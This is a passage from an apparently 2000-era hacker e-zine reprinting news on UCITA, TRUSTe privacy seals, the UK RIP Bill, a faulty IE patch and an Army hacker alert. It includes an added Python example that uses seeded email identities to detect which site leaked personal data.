      restrict the users in onerous ways. So even if the software is 
      unchanged, the users will be worse off. 

      For example, the owners will be able to change the software license at 
      any time, restricting what you are allowed to do with a program. They 
      will be able to send you e-mail containing new conditions, and these new 
      conditions will be legally binding on you even if you never actually got 
      the mail. 

      If you do see the mail and you reject the new conditions, they will be 
      able to demand that you stop using the program -- and even send your 
      machine a message across the network to turn off the program without a 
      moment's notice. 

      ZDNet: If there is so much opposition, why has the BSA, and others, had 
      so much success in pushing the bill through? 

      Stallman: As far as I know, they have succeeded in one state. The term 
      "so much success" seems to be an exaggeration. 

      I don't know why they succeeded in Virginia; I can only guess. But here 
      are some things, which are not unusual, which may have happened this 
      time:

         1. The supporters of UCITA probably are better organized and have 
         more money to contribute to election campaigns. 

         2. The legislators probably have not actually read UCITA, and that 
         enabled supporters of UCITA to mislead them about both what UCITA 
         would do and why people oppose it. 

         3. The supporters of UCITA probably told the legislators ... that if 
         Virginia passes UCITA and other states do not, some software 
         companies will move to Virginia. 

      State legislators and governors often give an unreasonable amount of 
      emphasis to winning business to their states from other states. They 
      often do this without regard to whether the country as a whole will 
      benefit or suffer as a result. Business often uses this to manipulate 
      states, to play one state against another, to get what it wants. 

      The joke, though, is on them, because only retail Internet sites would 
      move to Virginia, and the total employment of these sites would be 
      insignificant. The software development will remain where it is, in 
      California, Washington, Bangalore or wherever.
     
     
     (Sorry about formatting, couldn't be bothered to pretty it up ... - Ed)
      
      @HWA
      
      
      
23.0  HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The industry trade group TRUSTe was formed in an
      effort at self regulation and to help fend off unwanted
      legislation. Are they really doing the public a service? An
      interview with TRUSTe CEO Bob Lewin details how even
      sites selling personal data can acquire the privacy seal
      of approval. 

      Salon 
      http://www.salon.com/tech/view/2000/03/13/truste/index.html
      
     The privacy police? 
     TRUSTe CEO Bob Lewin explains how even sites selling
     personal data can get the nonprofit's privacy seal of approval.

     - - - - - - - - - - - -
     By Lydia Lee 

     March 13, 2000 | When TRUSTe launched in 1996, the nonprofit promised
     to help the Internet industry regulate itself with regard to protecting
     surfers' privacy. Over the past three years, it has vetted the privacy
     policies of over 1,300 sites, and its black-and-green logo, which
     signals to visitors that a site actually abides by its policies, can be
     found on most major e-commerce sites. But what kind of teeth does the
     organization really have?

     TRUSTe didn't look so trusty last year when a security expert
     found that its licensee RealNetworks had been collecting user
     information on the sly. Instead of reprimanding the company, the
     nonprofit argued that because RealNetworks' privacy violations
     took place via its RealJukebox software, not its Web site, the
     incident was outside the purview of TRUSTe. More recently, it's
     been other privacy advocacy groups like JunkBusters that have
     alerted the public to privacy violations such as Intel's decision to
     include an identifier in its Pentium III chip; JunkBusters also
     started a campaign against DoubleClick's acquisition of Abacus
     when it was announced last June.

     But Bob Lewin, executive director and CEO of TRUSTe, says
     the group's privacy seal program plays an important role in
     enforcing privacy policies. Previously, Lewin was vice president
     of marketing at networking software company ISOCOR and
     before that at the open systems consortium X/Open Company.
     Now he heads up this nonprofit that charges between $300 and
     $4,999 to certify an e-commerce site's privacy practices.

     What's the basic message you're giving to consumers when
     they see the TRUSTe symbol? Is it that the site isn't going
     to sell my data?

     The bottom line is that this site adheres to the fair information
     practices -- that they are disclosing what information they're
     collecting, why and if they're sharing that information with
     somebody. No 2: that they're giving the visitor the choice --
     whether to allow that to happen; 3) that once the information is
     collected, they will use reasonable security to protect that
     information; 4) that they allow the consumer reasonable access to
     that information to modify it.

     So if I were collecting consumers' e-mail addresses and
     then selling them to a direct-marketing company, would I
     still be able to get the TRUSTe symbol?

     Only if you stated that to the consumer in your privacy statement.
     If somebody came to us and said, "Here's our privacy statement.
     We will collect the e-mail addresses, and it's our intent to sell or
     share this information with these third parties, and we are giving
     you the option to say yes or no to this." Then that site could
     become a TRUSTe licensee.

     What percentage of sites get rejected?

     It's not a large percentage -- I'd guess 1 to 2 percent.

     What's the major reason sites get rejected?

     Once they start through the process, they can't or will not meet
     the requirements of the program. Say they'd like to be able to
     share info with a subsidiary, and we say, "That's to a third party,
     you have to disclose that." Well, they may voluntarily decide
     they're not going to proceed. Also, we don't apply our mark to
     gambling sites, since it's illegal in some states. The other reason
     that it happens, frankly, is that 85 percent of our sites are very
     small -- $10 million and below --- and as the process starts, the
     company goes out of business.

     If DoubleClick had been a TRUSTe member, would its
     decision to combine its database of anonymous surfing
     habits with an acquired database of personal information
     have set off red flags for you?

     There would be some issues. That's why we formed a third-party
     ad server committee, to get all the technical and legal issues out
     on the table. 

     They would have had to inform us before they changed their
     policy, and we would have had some discussions.
     
     Once it has the TRUSTe seal, have you ever kicked out a
     site for doing something?

     No, we've come very close, but we haven't had to do it. The
     escalation process is as follows: We get a complaint from a
     consumer about a licensee, and once we are assured that the
     consumer had previously contacted the Web site to try and get it
     resolved -- because a lot of these are just misunderstandings --
     we then contact the Web site and investigate and find out indeed
     if there's a real issue here. Now, the resolution to this may result
     in a change in the privacy policy, the business model, or what
     have you.

     Shouldn't you have caught that kind of stuff when you
     reviewed the policy in the first place?

     Well yes, but the nature of the beast is that all of this is software.
     What is generally the case is that there's been some unplanned
     feature in the software. Something will happen -- not that
     somebody wanted to do it, but the software allowed them to do
     it. So, when it happens, you point it out, it gets fixed and it's over.

     But that shouldn't mean they need to change their privacy
     policy, should it?

     It could be just a software change, but it could be a policy
     change. Let's say you implement software that shares information,
     or decide to collect more info than you originally stated --
     perhaps you're collecting IP addresses, or disseminating cookies.
     So you have to change your policy. This whole thing is not a static
     field. We do constant monitoring, but many of our licensees will
     communicate with us, and in fact one-third of our efforts is
     focused on working with them. As their Web sites evolve, we've
     got to ensure that the privacy statement evolves. It's an ongoing
     process.

     Would it be incumbent on the company to notify all the
     users who had seen the previous privacy policy?

     If they start collecting new information, then at that point in time,
     they have to communicate to users from this point forward, "We
     are also doing this." So that has to be stated clearly in the privacy
     statement. It would not impact people from beforehand because
     that information was not being collected. 

     But what if the people from beforehand come back and then
     they don't read the privacy policy? Is there anything in the
     TRUSTe program that says if you are instituting a new
     privacy policy, you have to let all the consumers from
     before know that?

     Well, we can't force consumers to read privacy statements, but in
     all our consumer outreach programs, we tell people: Even if
     you've visited this site before -- because things change -- the first
     thing to do is go to the privacy statement and review it to make
     sure there have been no changes. And we encourage licensees to
     put any changes up at the front. This is easier said than done --
     none of us like to read pages and pages of text.

     Have you ever blown the whistle on a company? 

     Yes, there are instances -- most of the problems are not with
     malice aforethought. The major monitoring is by consumers
     themselves, but we have people who look at the sites every
     quarter, to see if there've been any changes on the site. We also
     enter in names that we make up, opt-in in some cases and
     opt-out in others, so if we get communication to a name then we
     know where it came from.

     What role should the government have in enforcing online
     privacy?

     They play a very important role now, because they conduct
     studies on whether improvement has occurred within the industry
     -- the number of privacy statements, the quality of privacy
     statements. I think the government has clearly stated that certainly
     in the health-care and financial area, they feel the need to have
     some kind of legislation. They also did that for children --the
     Children's Online Privacy Protection Act. They've said that
     because this is super-sensitive information, you should have some
     guidelines. 

     Now, the question becomes, what vehicle do you use to enforce
     that legislation, which is equally important. We feel that seal
     programs -- and in particular, TRUSTe -- play a very important
     part there. COPPA is going into law April 21, and our contract
     will contain the elements for Web sites to adhere to COPPA
     requirements.

     But it seems like a lot for any one company to keep up
     with. With all these violations going on, it seems like there
     needs to be a more watchful eye.

     I would say that there is a watchful eye, if people look at the facts
     versus hype from some advocacy groups. It's all very well to run
     around screaming and yelling, "The sky is falling, the sky is
     falling," but the fact is, many of these issues that have come up are
     evolutions that occur in business models on the site. I would argue
     that the industry has demonstrated very quick response when
     those problems come up. 

     Take RealNetworks. The issue there occurred outside the scope
     of the current TRUSTe program. Yes, RealNetworks is a
     TRUSTe licensee, but this particular issue had nothing to do with
     the collection of personal information on the Web site; it had to
     do with the collection of user information using software servers.
     Now, within a week, even though it was outside the program, we
     announced the formation of a pilot to evolve our program to
     handle those situations. I defy any government agency to do that.

     But customers aren't thinking, when they see the TRUSTe
     symbol, that it only covers the Web site. Maybe from the
     technical view it's different, but the consumer isn't going to
     make the distinction. Does the TRUSTe program cover
     both now?

     Yes, we need to do a better job so the consumer intuitively
     knows what the TRUSTe logo stands for. Ultimately, it would be
     great -- as we lay out the software privacy program -- to blend
     the two programs together. Or there may be a TRUSTe symbol
     for sites and one for software.

     What privacy issues are you trying to anticipate?

     One thing we're looking at is the wireless world, where we start
     talking about palm-held things and hand-held things and phones. I
     think there are some issues there we haven't fully addressed yet.
     We need to add more meat to the term "reasonable security."
     Today, that's the best term people have, because it can vary so
     much depending on the application and the technology. As we put
     more and more of these things into people's hands, we have to
     worry about how we prove that the person holding it is indeed the
     proper owner.
     salon.com | March 13, 2000

     - - - - - - - - - - - -

     About the writer
     Lydia Lee is an associate editor for Salon
     Technology.
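     Lewin's remark above about registering made-up names, some opted in
     and some opted out, and watching where mail to them comes from, is a
     seeded-identity (honeytoken) check. The following Python is an added
     example, not TRUSTe's tooling and not code from the Salon piece; the
     licensee names, the monitoring domain and the key are constructed for
     illustration. Each seed address carries a keyed tag bound to the site
     it was registered with and to the consent choice made there, so a hit
     cannot be produced by guessing addresses, and mail arriving at an
     opt-out seed attributes the disclosure to exactly one site.

```python
import hashlib
import hmac
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed values for this example: the key would live outside source in
# practice, and the domain is a hypothetical mailbox domain the monitor controls.
SECRET_KEY = b"example-seed-key"
SEED_DOMAIN = "seeds.example"


class Seed(NamedTuple):
    site: str        # licensee the identity was registered with
    opted_in: bool   # whether sharing/marketing contact was permitted at sign-up


def seed_tag(site: str, opted_in: bool, key: bytes = SECRET_KEY) -> str:
    """Keyed tag binding a seed to (site, consent choice).

    HMAC keeps the tags unguessable, so mail to a seed address implies the
    address was obtained from the site it was registered with, not enumerated.
    """
    choice = "in" if opted_in else "out"
    return hmac.new(key, f"{site}|{choice}".encode(), hashlib.sha256).hexdigest()[:12]


def seed_address(site: str, opted_in: bool) -> str:
    """Unique mailbox registered with one site under one consent choice."""
    return f"seed-{seed_tag(site, opted_in)}@{SEED_DOMAIN}"


def build_registry(sites: List[str]) -> Dict[str, Seed]:
    """One opt-in and one opt-out identity per licensee, keyed by address."""
    registry: Dict[str, Seed] = {}
    for site in sites:
        for opted_in in (True, False):
            registry[seed_address(site, opted_in)] = Seed(site, opted_in)
    return registry


def attribute(recipient: str, registry: Dict[str, Seed]) -> Optional[Tuple[str, str]]:
    """Map an inbound recipient to (site, verdict); None if it is not a seed.

    'consented' means the seed had opted in, so contact is within the stated
    policy; 'violation' means the opt-out identity was shared anyway.
    """
    seed = registry.get(recipient.strip().lower())
    if seed is None:
        return None
    return seed.site, "consented" if seed.opted_in else "violation"


def triage(messages: List[Tuple[str, str]],
           registry: Dict[str, Seed]) -> List[Tuple[str, str, str]]:
    """(sender, recipient) pairs -> (sender, leaking site, verdict) for seed hits."""
    findings = []
    for sender, recipient in messages:
        hit = attribute(recipient, registry)
        if hit is not None:
            findings.append((sender, hit[0], hit[1]))
    return findings


if __name__ == "__main__":
    # Constructed inbound mail: a third-party mailing to an opt-out seed,
    # a first-party newsletter to an opt-in seed, and one unrelated message.
    reg = build_registry(["alpha-shop.example", "beta-news.example"])
    inbound = [
        ("promo@list-broker.example", seed_address("alpha-shop.example", False)),
        ("news@beta-news.example", seed_address("beta-news.example", True)),
        ("someone@elsewhere.example", "postmaster@seeds.example"),
    ]
    for sender, site, verdict in triage(inbound, reg):
        print(f"{verdict:9s} {site:22s} mail from {sender}")
```

     The recipient address is what attributes a leak; the sender only shows
     who ended up using the data. A hit on an opt-out seed is the finding
     worth escalating, and a site that learns the seed pattern can simply
     suppress those addresses, so seeds should be re-issued periodically.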
     
     @HWA


24.0  HNN:Mar 15th:UCITA Signed By Governor in Virginia 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by techs 
      Set to take effect in July 2001 the Uniform Computer
      Information Transaction Act has been signed into law in
      Virginia by Governor James S. Gilmore III. UCITA will
      allow software companies to remotely disable software
      and will give licensing agreements the force of law. 

      Washington Post
      http://www.washingtonpost.com/wp-dyn/articles/A6866-2000Mar14.html
      
      Computer World           
      http://www.computerworld.com/home/print.nsf/all/000314F772
      
      Post;
      
      Gilmore Signs 1st Internet Commercial Code Into Law  
      By Craig Timberg
      Washington Post Staff Writer
      Tuesday, March 14, 2000; 1:00 PM  
      
      Virginia Gov. James S. Gilmore III signed the nation's first set of 
      contractual rules specifically governing electronic commerce into law
      today on the second day of an Internet summit at George Mason University.

      The Uniform Computer Information Transaction Act, which is typically 
      called by its initials "UCITA," overwhelmingly passed the General 
      Assembly during the just-finished legislative session despite the 
      opposition of critics who contended it would erode basic consumer 
      rights. Because of that continuing debate, the law will not take 
      effect until July 2001 while lawmakers study the fine print. 

      Supporters such as Gilmore (R) say UCITA mainly updates for the 
      Information Age the commercial codes that states passed decades ago.
      UCITA essentially gives the force of law to software licensing 
      agreements as soon as a consumer rips the shrink-wrap off the box or
      hits the "I Accept" button on a program downloaded from the Internet.
       
      "UCITA provides clarity to contract law where none existed before,
      which will make it easier for consumers and industries to conduct 
      transactions via the Internet," Gilmore said in a statement. "This
      increase in electronic transactions will perpetuate the Internet 
      revolution, promote e-commerce and foster the growth of Virginia's
      technology and manufacturing economies."
      
      State officials hope that by becoming the first state to adopt 
      UCITA, Virginia will further its reputation as a center of 
      high-technology and attract more businesses to the state.
      
      But consumer advocates warn that in the rush to adopt UCITA, 
      Virginia overlooked concerns that have caused two dozen attorneys
      general around the country, including Maryland's J. Joseph Curran Jr.
      (D) to write a letter voicing concerns.
      
      Consumer groups warn that UCITA will give software companies new 
      power to disable or "repossess" their products if they believe they
      are being used in a way that violates the licensing agreement. 
      Another worry, say consumer advocates, is that buyers won't always
      know the details of the licensing agreements until after the purchase
      is made.
      
      "The whole idea of informed shopping is based on disclosure before
      purchase," said Jean Ann Fox of the Virginia Citizens Consumer 
      Council, which lobbied against the bill.
      
      The signing took place at The 2000 Global Internet Summit at 
      George Mason's campus in Fairfax.
  
      (c) 2000 The Washington Post Company 
      
      -=-
      
      Computer World;
      
      Va. governor signs UCITA legislation into law
 
      By Patrick Thibodeau
      
      03/14/2000 Fairfax, Va. -- Flanked by the chairman of one
      of the state's largest businesses -- America Online
      Inc.'s Steve Case -- Virginia Gov. James Gilmore today
      signed the Uniform Computer Information Transactions
      Act (UCITA) into law. 
 
      But the bill won't take effect until July 2001, giving
      people and businesses with concerns about UCITA time
      to seek legislative amendments, the governor said. 
 
      "We're not deaf to people's concerns," said Gilmore.
      Still, Gilmore said he doesn't believe those concerns
      were "legitimate impediments" to the state's adoption
      of the legislation. 
 
      The year-delay for adoption came at the behest of a
      coalition of some of the state's largest nontechnology
      companies, who believe UCITA gives software vendors
      the upper hand in software licensing. 
 
      "If there's any sense that things may not be quite right,
      there is plenty of time for people to come in under
      Virginia's approach and have a chance to do some
      amendments," said Gilmore. The state plans to create a
      study committee to examine the issues raised by the
      business coalition that sought to delay the law's
      implementation. 
 
      UCITA sets a series of default rules governing
      commercial software transactions. One of its most
      controversial provisions would allow a software vendor
      to automatically disable software in a contract dispute. 
 
      Case praised Virginia's action and said he hoped "other
      states will look at this and learn from this and embrace
      it." 
 
      Virginia is moving quickly on UCITA to help create an
      attractive climate for its technology businesses. For
      UCITA to become the law of the land, technically it
      must be adopted by 50 states. But companies may
      nonetheless cite UCITA in their license agreements. "If
      Virginia remains the only state that adopts this, then I
      believe that the certainty of our (actions) would attract
      additional businesses into the commonwealth," said
      Gilmore. 
 
      Maryland is also actively considering the legislation. 
  
      @HWA
      
            
25.0  HNN:Mar 15th:RIP Goes Before Commons Today 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Lady Sharrow 
      The UK Government's Regulatory Investigatory Powers
      (RIP) Bill goes before Select Committee in the House of
      Commons today and in a little more than six months it
      could be enshrined in law. The bill will force ISPs to
      have the facilities to log and monitor all online activities
      of their users. 

      The Register UK 
      http://www.theregister.co.uk/000314-000016.html
      
      
      Posted 14/03/2000 11:37am by Sean Fleming
    
      What the hell is... the UK's RIP Bill
    
      The UK Government's Regulatory Investigatory Powers (RIP) Bill goes before Select
      Committee in the House of Commons today and in a little more than six months it
      could be enshrined in law. But with 30 amendments tabled against it and an angry
      mob of opponents waiting to string it up, RIP has become better known for the
      widespread - and some might say kneejerk - reaction people have had to it, rather
      than for its aims and content. 
    
      Civil liberties groups, individual Net users and politicians from all the major UK parties
      are banding together to decry what is being labelled a Snoopers Charter. But just
      what is all the fuss about? The Blair administration has been slammed by many for its
      cronyism and control freakery, so is this just another example of Big Brother Blair
      wanting to watch over you at all times? 
    
      Growing pains 
      To become an accepted part of everyday life, and not just the place to go for
      cyberporn, e-fraud and to pick up your email, the Internet will have to appeal to a
      broader cross-section of the general public. Ecommerce, for example, will never thrive
      in a world where the majority of potential users and customers are too scared to part
      with their credit card details in case they get ripped off. The not-so-wired public need
      to feel confident about the Internet. This is all part of the natural evolution that all things
      go through when they achieve popularity. The days of the WWW Wild West are
      numbered. 
    
      So, what does the Bill propose and why are so many people objecting to it. The Bill
      describes itself as: "A Bill to make provision for and about the interception of
      communications, the acquisition and disclosure of data relating to communications,
      the carrying out of surveillance, the use of covert human intelligence sources and
      the acquisition of the means by which electronic data protected by encryption or
      passwords may be decrypted or accessed; to provide for the establishment of a
      tribunal with jurisdiction in relation to those matters, to entries on and interferences
      with property or with wireless telegraphy and to the carrying out of their functions by
      the Security Service, the Secret Intelligence Service and the Government
      Communications Headquarters; and for connected purposes." 
    
      Lots of spooky terms in there - "covert human intelligence sources" translates as
      spies - but in essence this is all about setting down a legal framework within which
      electronic communications are treated no differently from telephone tapping and
      intercepting mail (as in the paper stuff). Some people will throw their hands in the air
      at the very thought of any this but cracking down on the illegal use of the Internet by
      terrorists, perverts and organised criminals may be considered by many to be A Good
      Thing. 
    
      One size fits all 
      However, the Bill falls down - and in a big way - in the details. Or lack of them. It is
      vague on practicalities, and how permission to access private communication will be
      granted. ISPs will be obliged by law to have the facilities to log and monitor all the
      online activities of their users. But the Bill doesn't specify how this will be done. 
      And while there is talk of the Government reimbursing hardware costs with regard to
      monitoring, it doesn't make provision for the massive increase in overheads this will
      bring. 
    
      The Bill is also very vague in parts and can be interpreted in such a way that much of it
      becomes nonsensical. For example, it defines who will be covered by the Bill when it
      becomes law: "a person who provides a postal service, or b) a person who provides
      a public telecommunications service, or c) a person not falling within paragraph b)
      who has control of the whole or any part of a telecommunications system located
      wholly or partly in the UK." 
    
      ISPs, mobile phone companies, WAP service providers, news servers and so on all
      fall under the term "telecommunications service". Look at that definition again - it
      could mean anyone. 
    
      One of the Bill's fiercest critics is the organisation Stand. This is what Stand has to
      say on this point: "You're no longer using an ISP to connect to the Net. You're using the
      ISP's public telecommunication system." 
    
      The Bill also makes it an offence for you to be told that a surveillance warrant has ever
      been issued against you. That offence exists in perpetuity - there is no expiry date, you
      can never be told. And should anyone ever tell you they risk a prison sentence. 
    
      Someone to watch over me 
      Ah yes, you may be thinking, I live in a liberal democracy - the security forces can't just
      go round snooping on people willy nilly. Well, guess again. Here's what the Bill says
      about surveillance warrants. There are four main justifications given by the bill for
      issuing a warrant: 
      a) national security interests, 
      b) to prevent or detect serious crime, 
      c) to safeguard the UK's economic well being 
      d) for the purpose, in circumstances appearing to the Secretary of State to be
      equivalent to those in which he would issue a warrant by virtue of paragraph (b), of
      giving effect to the provisions of any international mutual assistance agreement. 
    
      And there's a list as long as your arm of those people who can issue the warrant
      against you - from senior police officers to "any such other persons as the Secretary of
      State may by order designate". 
    
      Reading between the lines, the Bill says that the Home Secretary can - for any reason
      - issue a warrant against anyone, and that anyone with the Home Secretary's
      permission can do likewise. Don't forget, you'll never know if information has been
      gathered about you, what it was used for and so on. 
    
      Taking Liberties 
      As it stands, reader Simon Batistoni writes, the RIP Bill contains one truly frightening
      basic assumption: if you have stored on your computer any form of encrypted
      message, you will be forced on request by the police to hand over the necessary keys
      to decrypt this data. If you do not have the keys, YOU MUST PROVE THAT YOU
      HAVE NEVER BEEN IN POSSESSION OF THEM, or you could be subject to a
      two-year jail term. 
    
      The principle of the police being able to view encrypted data, so that they can nail
      paedophiles, drug dealers, etc, has some genuine merits. 
    
      The flaw in this measure, however, is that the recipient/possessor of encrypted data is
      guilty, until proven innocent, something which destroys the entire foundation of our
      legal system. What's more, it is impossible to prove that you never had something. 
    
      As it stands, the measures in the Bill could be applied to a PGP-encrypted signature
      on an email, currently used by many as a reliable means of identity verification. 
    
      Theoretically, the innocent father of a suspect under 
      surveillance, who receives an email from his son containing the standard encrypted
      signature, could fall under the scope of this RIP Bill; he could be jailed for failing to
      reveal the contents of the encrypted data. 
    
      Ostriches need not apply 
      Small wonder that there is so much opposition to the Bill. There are many more
      examples of the above thinking running throughout the Bill, such as the loophole that
      could mean you have to keep tabs on yourself but can never let yourself know,
      otherwise you end up in prison. Stand has done a much more comprehensive job of
      examining RIP than The Register is able to do and its site is well worth a visit. 
    
      Don't be fooled into thinking that your Government will always have your best interests
      at heart, because that's not the way of Governments. But at the same time, don't
      assume that any attempt to regulate the Internet is an invasion of rights and freedoms -
      freedom without responsibility is, after all, little more than latent tyranny. We will all be
      affected by the RIP Bill when it becomes law - as it almost certainly will, in some form
      or another - so now is the time to find out a little more about it and decide where you
      stand, because in another six months it could all be too late.
  
      


      @HWA
      
26.0  HNN:Mar 15th:Security Patch Locks Out Users 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      A 128-bit security patch for Internet Explorer 5.0,
      5.0a, and 5.0b released by Microsoft will replace
      security files with older versions that will lock users out
      of their systems after restart. Microsoft has asked
      administrators to stop distributing the patch and has
      said that a fix will be available soon. 

      InfoWorld 
      http://www.infoworld.com/articles/en/xml/00/03/14/000314enpatch.xml
      
      IE5/Windows 2000 security patch can lock out users 
 
      By Cynthia Morgan, Computerworld        

      MICROSOFT WARNED NETWORK administrators on Monday to stop distributing a 
      security patch for Internet Explorer 5.0 that could prevent Windows 2000 
      users from logging in to their computers.        

      Instructions included with the patch, a 128-bit security add-on for 
      Internet Explorer 5.0, 5.0a, and 5.0b versions, are incorrect, said a 
      Microsoft spokesman. The error, a command-line "switch," causes an 
      automated installation to replace security files with older versions that 
      will lock users out of their systems after restart. The 128-bit security 
      installations under Windows 9x and Windows NT 4.x are not affected, the 
      spokesman added.        

      Administrators who have built automated installation packages for Internet 
      Explorer 5.0 on Windows 2000 systems should check the Microsoft site for 
      information on correcting the problem. Meanwhile, installation packages 
      containing the faulty switch should be frozen immediately.        

      A Microsoft KnowledgeBase bulletin (#Q255669) with complete instructions 
      and updates should be available at search.support.microsoft.com/kb within 
      24 hours, the spokesman said.       

      Microsoft Corp., in Redmond, Wash., is at www.microsoft.com       

      For more enterprise computing news, go to www.computerworld.com. Copyright 
      (C) 2000 Computerworld, Inc. All rights reserved.
      
      
      @HWA      


27.0  HNN:Mar 15th:DNA Used for Steganography 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Dan 
      17-year-old Romanian-born Viviana Risca topped the
      59th Intel Science Talent Search competition by
      embedding a computer message in the gene sequence
      of a strand of DNA using steganography, a data
      encryption technology that allows a computer user to
      hide a file within another file. 

      San Jose Mercury News 
      http://www.sjmercury.com/svtech/news/breaking/merc/docs/013955.htm
      
  

      Posted at 7:51 a.m. PST Tuesday, March 14, 2000 
      
      New York teen-ager wins $100,000 with encryption research 
      
      WASHINGTON (AP) -- A 17-year-old Romanian-born girl who embedded a computer 
      message in the gene sequence of a strand of DNA has been named the best 
      young scientist in the country.
      
      Viviana Risca, a senior at Paul D. Schreiber High School in Port Washington, 
      N.Y., won a $100,000 college scholarship when she bested 10 other high school 
      seniors on Monday in the 59th Intel Science Talent Search competition.
      
      Risca said her project in steganography, a data encryption technology that 
      allows a computer user to hide a file within another file, was a simple one. 
      Risca, who emigrated from Romania eight years ago, embedded the secret message 
      ``June 6 Invasion: Normandy.''
      
      Technologies like steganography can protect sensitive electronic information 
      from interception or eavesdropping, but they can also wreak havoc if used by 
      terrorists and criminals.
      
      Formerly known as the Westinghouse Science Talent Search, the contest has been 
      nicknamed the ``Junior Nobel Prize.'' Past winners include five Nobel laureates, 
      nine MacArthur Foundation fellows and two Fields medalists.
      
      Forty finalists came here to compete for the award.
      
      Jayce Getz, a senior at Big Sky High School in Missoula, Mont., won second prize 
      and a $75,000 scholarship for a math project on partition function. And Feng 
      Zhang, a senior at Theodore Roosevelt High School in Des Moines, Iowa, won third 
      prize and a $50,000 scholarship for a biochemistry project in molecular 
      virology.
      
      The other winners in the top 10, their schools, the amounts of their 
      scholarships and their projects were: Alexander Schwartz, Radnor (Pa.) High 
      School, $25,000, abstract algebra concerning Abelian groups; Eugene Simuni, 18, 
      Midwood High School in Brooklyn, N.Y., $25,000, a biochemistry project that 
      investigated G proteins; Matthew Reece, duPont Manual Magnet High School, 
      Louisville, Ky., $25,000, a proposal on fluid dynamics problems; Kerry Ann 
      Geiler, 17, Massapequa (N.Y.) High School, $20,000 for a project on communication 
      by ants; Elizabeth Williams, Palos Verdes Peninsula High School, Rolling Hills 
      Estates, Calif., $20,000, perception of light and shape by the brain; Zachary 
      Cohn, 17, Half Hollow Hills East High School in Dix Hills, N.Y., $20,000 for a 
      study of perfect squares; Bob Cherng, Troy High School, Fullerton, Calif., 
      $20,000, the transition of ammonia and hydrogen halide into ammonium halide.
      
      The other 30 finalists received $5,000 scholarships.

      @HWA
      
      
28.0  HNN:Mar 15th:Bugging SAT Phones 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Odin 
      A lot of people have turned to satellite phones as a last
      ditch effort to retain some privacy. Now Motorola has
      patented a means by which to listen in to a satellite
      phone to satellite phone call. 

      New Scientist 
      http://www.newscientist.com/news/news_222923.html
      (sorry: 404! - Ed)
      
      @HWA


29.0  HNN:Mar 15th:More and more EZines 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 

      contributed by L33t Dawg 
      New issues of several e-zines have been released
      including, Hack In The Box Issue #3, HWA Haxor news
      #51 and Datacore has released DataZine 0.02. 

      Hack In The Box Issue #3
      http://www.hackinthebox.org
      
      HWA.hax0r.news
      You're here already :-)
      
      DataZine .02 
      http://www.tdcore.com/index2.html

      @HWA
      
30.0  HNN:Mar 16th:Army on Alert Over CyberAttack Fear  
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
 
      contributed by Evil Wench 
      The Army has placed all of its worldwide cyber defense teams on full 
      alert after learning of a threat from a group known as The Boys From 
      Brazil. The group has threatened to deface the army.mil home page. 
      The Army has said that it is aware of the group's attack profile
      and is prepared for any attack against the Army's Web site, and that 
      it has enacted additional 'countermeasures' to protect the site. 
      (Is there really a threat? Who knows, but this sounds like one hell 
      of a publicity stunt.) 

      Federal Computer Week 
      http://www.fcw.com/fcw/articles/2000/0313/web-armyhac-03-15-00.asp
 
      Army on hacker alert 
 
      BY Dan Verton 
      Updated 03/16/2000 at 17:05 EST 
 
      HOUSTON -- The Army has placed its cyberdefense teams on full alert after a known
      hacker group threatened to take down the Army's World Wide Web home page this
      Friday. 
 
      On Tuesday evening the Army placed its cyberdefenders at the Land Information
      Warfare center at Fort Belvoir, Va., on full alert after a group known as the Boys
      from Brazil threatened to hack into the Army home page on Friday. 
 
      But today the Army clarified that the hacker group it is watching is Hacking for
      Girliez, which took down the New York Times' site in September 1998. Most of the
      hackers' remarks appeared in comment tags, which can be seen in source material
      but not on a Web page. The tags include such remarks as "'Immature kids' were able
      to bypass...$25,000 firewalls [and] bypass the security put there." 
 
      Philip Loranger, chief of the Command and Control Protect Division in the Army's
      Information Assurance Office, speaking here at the 2000 Army Directors of
      Information Management Conference, said the Army is prepared for any attack
      against its Web site. 
 
      "We've had to activate some countermeasures to protect the Army home page,"
      Loranger said, declining to provide specifics for security reasons. However, he said
      the countermeasures being put in place do not include disconnecting the Army site
      from the Internet. 
 
      Specific details emerged today on some of the steps the Army has taken in the past
      few months to prepare for these types of attacks. Lt. Col. James Withers, a
      systems engineering specialist with the Army signal command, said the Army's
      regional CERTs have written special software scripts that will help defend against
      known hacker tactics. The Army also developed Web cache proxy servers that
      divert Web surfers away from primary servers residing behind firewalls on Army
      installations. 
 
      The Army is also in the process of deploying a protected domain name system
      architecture that will help the service regain control of all Army Internet sites and
      network entry points. 
 
      "We know the hackers mapped [the old architecture]," Withers said, adding that 90
      percent of the Army's global protected DNS architecture should be completed by
      April. 
 
      Loranger demonstrated for conference attendees how simple it is for hackers to
      exploit known operating system vulnerabilities using widely available hacker tools and
      standard systems administrator procedures. In fact, Loranger, with the approval of
      the Army's staff counsel, demonstrated a live hacking of another computer system
      to show how within minutes hackers can crack into known password vulnerabilities
      and take over entire systems and networks. 
 
      Loranger also said that the lack of international laws governing conduct on the
      Internet poses real obstacles to the government's ability to respond to
      foreign-based hacker attacks. Loranger pointed out that some graduate-level
      computer education schools in India, for example, have established hacking into U.S.
      government systems as an academic requirement. 
 
      Lt. Col. LeRoy Lundgren, program manager for the Army's National Security
      Improvement Program, said as many as 285,000 network queries were denied by
      Army security systems last year because of the questionable method used.
      Lundgren added that the Army has seen an increase in the number of queries
